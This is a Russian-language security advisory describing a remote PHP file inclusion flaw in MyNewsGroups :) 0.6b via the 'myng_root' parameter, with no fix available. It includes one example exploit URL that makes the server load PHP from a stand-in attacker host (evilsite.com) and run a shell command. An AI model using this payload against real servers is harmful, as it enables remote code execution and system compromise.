PHP-инклюдинг в MyNewsGroups :)

Дата публикации:
04.08.2006
Всего просмотров:
971
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MyNewsGroups :) 0.x
Уязвимые версии: MyNewsGroups :) 0.6b, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "myng_root" в сценарии lib/tree/layersmenu.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P
EAR.php/&cmd=ls

URL производителя: mynewsgroups.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MyNewsGroups :) v. 0.6b <= Remote File Inclusion

или введите имя

CAPTCHA